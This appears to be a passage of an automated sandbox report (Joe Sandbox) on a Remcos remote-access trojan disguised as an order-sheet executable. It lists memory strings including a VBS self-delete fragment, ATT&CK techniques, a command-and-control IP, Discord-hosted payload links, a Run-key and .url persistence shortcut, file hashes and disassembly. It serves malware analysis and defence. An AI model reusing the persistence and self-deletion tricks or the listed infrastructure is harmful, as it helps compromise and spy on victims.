Source: secinit.exe, 00000013.00000002.356743910.0000000000500000.00000040.00000001.sdmp	String found in binary or memory: Remcos_Mutex_Inj
Source: secinit.exe, 00000013.00000002.356743910.0000000000500000.00000040.00000001.sdmp	String found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicence_code.txtSoftware\WDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\SETTINGSoverridepth_unenc3.1.5 Prov\|

Source: C:\Windows\SysWOW64\mobsync.exe	Code function: cmd.exe		8_2_0040559D
Source: C:\Windows\SysWOW64\dialer.exe	Code function: cmd.exe		18_2_0040559D

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Command and Scripting Interpreter1	Windows Service1	Access Token Manipulation1	Obfuscated Files or Information2	Input Capture11	Account Discovery1	Remote Desktop Protocol	Input Capture11	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Service Execution2	Registry Run Keys / Startup Folder1	Windows Service1	Software Packing1	Credentials In Files2	System Service Discovery1	SMB/Windows Admin Shares	Clipboard Data2	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Process Injection521	Masquerading1	NTDS	File and Directory Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Registry Run Keys / Startup Folder1	Virtualization/Sandbox Evasion1	LSA Secrets	System Information Discovery23	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol1	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Access Token Manipulation1	Cached Domain Credentials	Security Software Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol12	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection521	DCSync	Virtualization/Sandbox Evasion1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Process Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
19.2.secinit.exe.500000.0.unpack	100%	Avira	HEUR/AGEN.1141389	Download File
8.0.mobsync.exe.10590000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
18.2.dialer.exe.10590000.2.unpack	100%	Avira	TR/Dropper.Gen	Download File
8.0.mobsync.exe.10590000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
8.2.mobsync.exe.10590000.2.unpack	100%	Avira	TR/Dropper.Gen	Download File
18.0.dialer.exe.10590000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
8.2.mobsync.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1141389	Download File
19.0.secinit.exe.10590000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
19.0.secinit.exe.10590000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
19.0.secinit.exe.10590000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
18.0.dialer.exe.10590000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
8.0.mobsync.exe.10590000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
18.0.dialer.exe.10590000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
8.0.mobsync.exe.10590000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
18.0.dialer.exe.10590000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
18.2.dialer.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1141389	Download File
19.2.secinit.exe.10590000.1.unpack	100%	Avira	TR/Dropper.Gen	Download File
19.0.secinit.exe.10590000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
204.44.86.179	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdn.discordapp.com	162.159.135.233	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
204.44.86.179	true	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
204.44.86.179	unknown	United States		8100	ASN-QUADRANET-GLOBALUS	true
162.159.135.233	cdn.discordapp.com	United States		13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	479213
Start date:	07.09.2021
Start time:	18:15:44
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@9/5@3/3
EGA Information:	Successful, ratio: 40%
HDC Information:	Successful, ratio: 80.4% (good quality ratio 76.6%) Quality average: 82.3% Quality standard deviation: 26.3%
HCA Information:	Successful, ratio: 99% Number of executed functions: 29 Number of non-executed functions: 279
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 20.50.102.62, 40.112.88.60, 20.82.209.183, 80.67.82.235, 80.67.82.211 Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net Execution Graph export aborted for target Cshgvzx.exe, PID 5296 because there are no executed function Execution Graph export aborted for target Cshgvzx.exe, PID 5384 because there are no executed function Execution Graph export aborted for target RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe, PID 5256 because there are no executed function Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:16:40	API Interceptor	1x Sleep call for process: RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe modified
18:16:44	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Cshgvzx C:\Users\Public\Libraries\xzvghsC.url
18:16:52	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Cshgvzx C:\Users\Public\Libraries\xzvghsC.url
18:17:00	API Interceptor	2x Sleep call for process: Cshgvzx.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
204.44.86.179	Invoice-packing list BL NO. 212142500 MRKU7550471 ML-IN4104393.tar	Get hash	malicious	Browse
	New_Order_for_September#442625272-doc-signed copy.exe	Get hash	malicious	Browse
	New_Order_for_September#442625272-doc-signed copy.exe	Get hash	malicious	Browse
162.159.135.233	mosoxxxHack.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/710557342755848243/876828681815871488/clp.exe
	Sales-contract-deaho-180521-poweruae.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/843685789120331799/844316591284944986/poiu.exe
	PURCHASE ORDER E3007921.EXE	Get hash	malicious	Browse	cdn.discordapp.com/attachments/809311531652087809/839820005927550996/Youngest_Snake.exe
	Waybill Document 22700456.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/809311531652087809/839856358152208434/May_Blessing.exe
	COMPANY REQUIREMENT.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/819674896988242004/819677189900861500/harcout.exe
	Email data form.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/789279517516365865/789279697203757066/angelx.scr
	Down Payment.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
	Vessel details.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/780175015496777751/781048233136226304/mocux.exe
	Teklif Rusya 24 09 2020.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/733818080668680222/758418625429372978/p2.jpg

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn.discordapp.com	2101222_OrdineFornitore del.ppam	Get hash	malicious	Browse	162.159.133.233
	ORDER 33212762.ppam	Get hash	malicious	Browse	162.159.135.233
	38fd2cb3083f33b50606b7821453769103bde24335734.exe	Get hash	malicious	Browse	162.159.133.233
	JSYInjvdnM.exe	Get hash	malicious	Browse	162.159.129.233
	SecuriteInfo.com.W32.AIDetect.malware2.7985.exe	Get hash	malicious	Browse	162.159.134.233
	WAYBILL.EXE	Get hash	malicious	Browse	162.159.133.233
	Eklenen yeni siparis.exe	Get hash	malicious	Browse	162.159.135.233
	KlErfuBsH2.exe	Get hash	malicious	Browse	162.159.135.233
	H32ChHNoNW.exe	Get hash	malicious	Browse	162.159.133.233
	Wdq9HRCTrG.exe	Get hash	malicious	Browse	162.159.134.233
	bk0Yz4tRBL.exe	Get hash	malicious	Browse	162.159.133.233
	Ouiojcejoyugnzyrllxqhjgpjgtmcpzvnp.exe	Get hash	malicious	Browse	162.159.133.233
	hhnkZPwzxi.exe	Get hash	malicious	Browse	162.159.133.233
	X117Xdqctj.exe	Get hash	malicious	Browse	162.159.135.233
	ffe39579163c231521098435348019227cca339b735ef.exe	Get hash	malicious	Browse	162.159.135.233
	Ko6lDa3LMx.exe	Get hash	malicious	Browse	162.159.135.233
	Invoice-packing list BL NO. 212142500 MRKU7550471 ML-IN4104393.tar	Get hash	malicious	Browse	162.159.129.233
	UwQkw83lMK.exe	Get hash	malicious	Browse	162.159.135.233
	qqlbBIsqPQ.exe	Get hash	malicious	Browse	162.159.135.233
	Bxs1wBHcNS.exe	Get hash	malicious	Browse	162.159.133.233

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ASN-QUADRANET-GLOBALUS	BahcfFNy25bmV1c.exe	Get hash	malicious	Browse	154.81.38.79
	Invoice-packing list BL NO. 212142500 MRKU7550471 ML-IN4104393.tar	Get hash	malicious	Browse	204.44.86.179
	PO23456.doc	Get hash	malicious	Browse	104.223.93.90
	Swift Copy.doc	Get hash	malicious	Browse	104.223.93.90
	mips	Get hash	malicious	Browse	104.223.82.208
	DHL-Express-Document.doc	Get hash	malicious	Browse	104.223.93.90
	DHL-Express-Description.doc	Get hash	malicious	Browse	104.223.93.90
	iq12CZCZjT	Get hash	malicious	Browse	198.96.89.47
	ORDER ACKNOWLEDGEMENT & PROFORMA INVOICE.PDF.EXE	Get hash	malicious	Browse	154.81.38.104
	udp	Get hash	malicious	Browse	204.44.93.54
	lgTwTtkeIR	Get hash	malicious	Browse	155.94.178.138
	try.exe	Get hash	malicious	Browse	69.174.100.168
	RmjhrUdTri.exe	Get hash	malicious	Browse	172.93.187.66
	syna	Get hash	malicious	Browse	155.94.178.138
	New_Order_for_September#442625272-doc-signed copy.exe	Get hash	malicious	Browse	204.44.86.179
	New_Order_for_September#442625272-doc-signed copy.exe	Get hash	malicious	Browse	204.44.86.179
	mirai.x86	Get hash	malicious	Browse	107.150.24.141
	BALLANCE PAYMENT.doc	Get hash	malicious	Browse	104.223.93.90
	5sNHIrfRwn.exe	Get hash	malicious	Browse	107.150.23.149
	1073645267891287347.jar	Get hash	malicious	Browse	172.93.187.66
CLOUDFLARENETUS	z5WnxHv7bg.exe	Get hash	malicious	Browse	104.18.6.156
	0HsDg7f3eG.exe	Get hash	malicious	Browse	104.18.6.156
	3RQvR8bIfa.exe	Get hash	malicious	Browse	104.18.7.156
	Swift 07.09.21.exe	Get hash	malicious	Browse	66.235.200.146
	IMG_80350001.exe	Get hash	malicious	Browse	104.18.6.156
	IMG_8035002078801.doc	Get hash	malicious	Browse	104.18.7.156
	DLT_85620000107.exe	Get hash	malicious	Browse	23.227.38.74
	SvgoEJMLe7.dll	Get hash	malicious	Browse	172.67.70.134
	a1gc77epIx.dll	Get hash	malicious	Browse	104.26.6.139
	OKS.exe	Get hash	malicious	Browse	172.67.188.154
	eDpXMjvZO0.exe	Get hash	malicious	Browse	172.67.173.58
	9c2NwBeaMN.exe	Get hash	malicious	Browse	104.21.34.192
	famz6.doc	Get hash	malicious	Browse	23.227.38.74
	2101222_OrdineFornitore del.ppam	Get hash	malicious	Browse	162.159.133.233
	SYuBVzCs5U.exe	Get hash	malicious	Browse	172.67.221.88
	cs.exe	Get hash	malicious	Browse	172.67.164.78
	ORDER 33212762.ppam	Get hash	malicious	Browse	162.159.134.233
	vbc(1).exe	Get hash	malicious	Browse	104.21.89.140
	ENQUIRYSMRT119862021-ERW PIPES.pdf.exe	Get hash	malicious	Browse	172.67.196.70
	COAU7229898130.xlsx	Get hash	malicious	Browse	104.21.8.222

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	uYZQ72bfTF.exe	Get hash	malicious	Browse	162.159.135.233
	yGY3UQymu4.exe	Get hash	malicious	Browse	162.159.135.233
	cGJ916maFX.exe	Get hash	malicious	Browse	162.159.135.233
	OffboardDiagLauncher.exe	Get hash	malicious	Browse	162.159.135.233
	scan_doc001091121.exe	Get hash	malicious	Browse	162.159.135.233
	FedEx AWB# 8611746580734 ,PDF.exe	Get hash	malicious	Browse	162.159.135.233
	RFQ_PARTS PRICELIST 110-10007046,pdf.exe	Get hash	malicious	Browse	162.159.135.233
	RFQ 2021-09.exe	Get hash	malicious	Browse	162.159.135.233
	Quote.exe	Get hash	malicious	Browse	162.159.135.233
	purchase order.exe	Get hash	malicious	Browse	162.159.135.233
	bt2091.exe	Get hash	malicious	Browse	162.159.135.233
	b3qnpvoALc.exe	Get hash	malicious	Browse	162.159.135.233
	8X0Zj8zIDN.exe	Get hash	malicious	Browse	162.159.135.233
	OKS.exe	Get hash	malicious	Browse	162.159.135.233
	eDpXMjvZO0.exe	Get hash	malicious	Browse	162.159.135.233
	Ted_Yeung.html	Get hash	malicious	Browse	162.159.135.233
	Ted_Yeung.html	Get hash	malicious	Browse	162.159.135.233
	Qly2dKZwCy.exe	Get hash	malicious	Browse	162.159.135.233
	2101222_OrdineFornitore del.ppam	Get hash	malicious	Browse	162.159.135.233
	aJkjc0EPD2.exe	Get hash	malicious	Browse	162.159.135.233

Dropped Files

No context

Created / dropped Files

C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe Download File
Process:	C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	792576
Entropy (8bit):	6.622449628761002
Encrypted:	false
SSDEEP:	6144:5CZ5dEs7ZrwziKYDZ2/avaYvqfbUacyHeP/hz0Xkb5fjUOCMXjqfZPFVb/4rr7ZW:QZ5l7ZrwzLCMHHi5rUlI64rimoAzyZV
MD5:	06534C059B111776B838F793C6444622
SHA1:	7EBDA7124A60DE107A00960D9FE0563FD3CD2760
SHA-256:	933A4D2ABFDF0F91550A102808D00ADACE6EB9DF89EA9E254E2DF7601B02DD8F
SHA-512:	9E1498B78D6682F1CDE8717A85570DF742D4FA2D7C59D554AFB938AF4DB1EEFFB13522682068D81EFC676DDD4DD80741ABCF1B1AE94560B01AD2C4FDF69D9CDD
Malicious:	true
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................4......4.............@..............................................@..............................L#...p...&.......................j..................................................................................CODE....\|........................... ..`DATA.....z.......\|..................@...BSS.....A4...p.......`...................idata..L#.......$...`..............@....tls.....................................rdata..............................@..P.reloc...j.......l..................@..P.rsrc....&...p...&..................@..P....................................@..P........................................................................................................................................

C:\Users\Public\Libraries\xzvghsC.url Download File
Process:	C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Cshgvzx\\Cshgvzx.exe">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	96
Entropy (8bit):	4.866547012067739
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XMKf6ABvsGKd7ovn:HRYFVmTWDyz/vsb7yn
MD5:	2DDF040A20140597A72FE56E21E798F0
SHA1:	5DCAFBE1835C1A8AC7A97586B6BEF970A6FFC60B
SHA-256:	01ED6321AF738C2093089DD77FDE2C2B54A70655499BC8490B835FDEB4A66FDE
SHA-512:	1369F56AEF6B4FFBB5EBE1AC161FB52693B535259CEF4D0F0842A7C7789F65A9FAFE825C2FFB1D5CCE5563930C0A2DDECBF0CEC6E63E559B6344856E3857C054
Malicious:	false
Yara Hits:	Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\xzvghsC.url, Author: @itsreallynick (Nick Carr)
Reputation:	low
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Cshgvzx\\Cshgvzx.exe"..IconIndex=3..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Cshgvzxpdvyucjurgvmywubhtofxefb[1] Download File
Process:	C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe
File Type:	data
Category:	dropped
Size (bytes):	579072
Entropy (8bit):	7.997266864646308
Encrypted:	true
SSDEEP:	12288:VIjmqCh/9ePXG9kqy8Yc73pGyho53rgTgbPJ+H7it/rEj/sOf3rr:HqCh8vM3FYZy65cTgbE76z9Of/
MD5:	B5DC22D709B4D41A4B7160A90C203274
SHA1:	48663BAE9BB24E3EBB48F72A81B4CA2AE875D864
SHA-256:	89AFE9CCEFAC3D8481859648551A0F4E7C279F453137E2E6881AFA28EB9262C3
SHA-512:	8AC8EDC4FDC5C682250C7C76E595E40D905A1D5E771D356979209CAA8969F7B3808D7038033A1DFC05A86BA8CB56297BDE124D11B80BF940709EE57F5B3A43A1
Malicious:	false
Reputation:	low
Preview:	.....O$.l................VI)_.W.....G0.2.m.>.t./dt........z".`a.9.z'I5dw.VI)_.W.....G0.2.m.>.t./dt........z".`a.9.z'I5dw.VI)_.W.....G0.2.m.>.t./dt........z".`a.9.z'I5dw.VI)_.W.....G0.2.m.>.t./dt........z".`a.9.z'I5dw.VI)_.W.....G0.2.m.>.t./dt........z".`a.9.z'I5dw.VI)_.W.....G0.2.m.>.t./dt........z".`a.9.z'I5dw.VI)_.W.....G0.2.m.>.t./dt........z".`a.9.z'I5dw.VI)_.W.....G0.2.m.>.t./dt........z".`a.9.z'I5dw.VI)_.W.....G0.2.m.>.t./dt........z".`a.9.z'I5dw.VI)_.W.....G0.2.m.>.t...:....".:.. .vl.)G=....?p}.......i.-..0.3dVi...............i..Ap)q.'N.+L..m......h.....D.$.\|N......a._.B.I.n...A......s..D.....i..Ap)q.'N.+L..m......h.....D.$.\|N......a._.B.I.n...A......s..D.....i..Ap)q.'N..O...`$.....CJ..Z.i..8........++?N.b7D..\..~q....g.\|o..&.a.\.R&vA...c..\|qS..W.......N%...?."\.$UD..C...8...?..&5..Es.l_......)...b>.W.f&..Oh%..j&....-3?IvL...X...CA[...u......]........l_.D....=Kb3+&..4..6..a...16..#...Z..B....u...w......%.....lF..xzs....x.....5-D........'.%..@.$.4.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Cshgvzxpdvyucjurgvmywubhtofxefb[2] Download File
Process:	C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe
File Type:	data
Category:	dropped
Size (bytes):	579072
Entropy (8bit):	7.997266864646308
Encrypted:	true
SSDEEP:	12288:VIjmqCh/9ePXG9kqy8Yc73pGyho53rgTgbPJ+H7it/rEj/sOf3rr:HqCh8vM3FYZy65cTgbE76z9Of/
MD5:	B5DC22D709B4D41A4B7160A90C203274
SHA1:	48663BAE9BB24E3EBB48F72A81B4CA2AE875D864
SHA-256:	89AFE9CCEFAC3D8481859648551A0F4E7C279F453137E2E6881AFA28EB9262C3
SHA-512:	8AC8EDC4FDC5C682250C7C76E595E40D905A1D5E771D356979209CAA8969F7B3808D7038033A1DFC05A86BA8CB56297BDE124D11B80BF940709EE57F5B3A43A1
Malicious:	false
Reputation:	low
Preview:	.....O$.l................VI)_.W.....G0.2.m.>.t./dt........z".`a.9.z'I5dw.VI)_.W.....G0.2.m.>.t./dt........z".`a.9.z'I5dw.VI)_.W.....G0.2.m.>.t./dt........z".`a.9.z'I5dw.VI)_.W.....G0.2.m.>.t./dt........z".`a.9.z'I5dw.VI)_.W.....G0.2.m.>.t./dt........z".`a.9.z'I5dw.VI)_.W.....G0.2.m.>.t./dt........z".`a.9.z'I5dw.VI)_.W.....G0.2.m.>.t./dt........z".`a.9.z'I5dw.VI)_.W.....G0.2.m.>.t./dt........z".`a.9.z'I5dw.VI)_.W.....G0.2.m.>.t./dt........z".`a.9.z'I5dw.VI)_.W.....G0.2.m.>.t...:....".:.. .vl.)G=....?p}.......i.-..0.3dVi...............i..Ap)q.'N.+L..m......h.....D.$.\|N......a._.B.I.n...A......s..D.....i..Ap)q.'N.+L..m......h.....D.$.\|N......a._.B.I.n...A......s..D.....i..Ap)q.'N..O...`$.....CJ..Z.i..8........++?N.b7D..\..~q....g.\|o..&.a.\.R&vA...c..\|qS..W.......N%...?."\.$UD..C...8...?..&5..Es.l_......)...b>.W.f&..Oh%..j&....-3?IvL...X...CA[...u......]........l_.D....=Kb3+&..4..6..a...16..#...Z..B....u...w......%.....lF..xzs....x.....5-D........'.%..@.$.4.

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.622449628761002
TrID:	Win32 Executable (generic) a (10002005/4) 99.66% Win32 Executable Delphi generic (14689/80) 0.15% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe
File size:	792576
MD5:	06534c059b111776b838f793c6444622
SHA1:	7ebda7124a60de107a00960d9fe0563fd3cd2760
SHA256:	933a4d2abfdf0f91550a102808d00adace6eb9df89ea9e254e2df7601b02dd8f
SHA512:	9e1498b78d6682f1cde8717a85570df742d4fa2d7c59d554afb938af4db1eeffb13522682068d81efc676ddd4dd80741abcf1b1ae94560b01ad2c4fdf69d9cdd
SSDEEP:	6144:5CZ5dEs7ZrwziKYDZ2/avaYvqfbUacyHeP/hz0Xkb5fjUOCMXjqfZPFVb/4rr7ZW:QZ5l7ZrwzLCMHHi5rUlI64rimoAzyZV
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	acaca4b2a2968ea2

Static PE Info

General
Entrypoint:	0x45ef34
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	4dfd1417e7c3ef71650aaaaec402ef1c

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0045ECE4h
call 00007FC97CBCE9D1h
nop
nop
mov eax, dword ptr [004A6964h]
mov eax, dword ptr [eax]
call 00007FC97CC1D553h
mov ecx, dword ptr [004A69F8h]
mov eax, dword ptr [004A6964h]
mov eax, dword ptr [eax]
mov edx, dword ptr [0045E840h]
call 00007FC97CC1D553h
mov eax, dword ptr [004A6964h]
mov eax, dword ptr [eax]
call 00007FC97CC1D5C7h
call 00007FC97CBCC5FEh
nop
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xfb000	0x234c	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x107000	0x12600	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x100000	0x6a90	.reloc
